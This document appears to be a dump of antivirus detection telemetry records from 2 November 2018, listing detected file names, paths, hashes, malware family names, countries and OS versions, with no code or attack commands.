  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083330-50af9d29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083330-50AF9D29', filesize=768000, name='X2000M/Agent.3997.#M1.#R1'), hash='31ce23a877a9932f7b3c03b458fa8bc8fe52f7e00599ddd704e64f3027e4e9ee', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patchmeup.exe', filepath='D:\\transit\\e-SPT\\Aplikasi e-SPT pph 21 versi 2.1  th.2014\\2. installer update espt 21 ver 2.1 ( jan2014)\\patchmeup.exe', filesize=64000, name='W32/Alman.BB.#M1.#R1'), hash='1dc9749daa80d83143d41d832dc9f057873eb96bbaaf3d17eb2d9a6b0cd48b4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_273\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:02:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155308-3bf07c5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155308-3BF07C5E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160643-371fc9fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160643-371FC9FC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050334-9edb1ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050334-9EDB1EA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055650-0fbb8bcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055650-0FBB8BCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rxqitldz.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\rXqiTlDZ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX44.368\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX44.368\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:37:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061412-7cdc082b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061412-7CDC082B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054000-b6065089', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054000-B6065089', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053134-87f79d2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053134-87F79D2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wgccughq.exe', filepath='\\\\?\\F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\WGccUghQ.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052242-4b0cda72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052242-4B0CDA72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051536-4d2dea49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051536-4D2DEA49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061345-6ca6b23f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061345-6CA6B23F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061207-322d1342', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061207-322D1342', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='\\\\Srv-adc\\users$\\Marius.Stoleriu\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T05:40:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055253-82a5975c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055253-82A5975C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053938-a8a344ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053938-A8A344BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oceandn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\OCEANDN\\OCEANDN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061441-8de5871c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061441-8DE5871C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vmcamsdy.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\VmCAmSdy.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-220059-7fde248e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-220059-7FDE248E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061940-403611d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061940-403611D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053525-120333a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053525-120333A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053557-24db9465', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053557-24DB9465', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060814-a788d3f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060814-A788D3F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051310-f616b89d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051310-F616B89D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062603-24c23924', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062603-24C23924', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054538-7f46cab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054538-7F46CAB4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053458-01a68f30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053458-01A68F30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba4b04f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA4B04F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052710-ea8d1f73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052710-EA8D1F73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060409-157aa5d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060409-157AA5D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052340-6de2b4fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052340-6DE2B4FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061640-d53684ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061640-D53684CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052849-2606cb59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052849-2606CB59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:48Z'), dt=datetime.date(2018, 11, 2)),
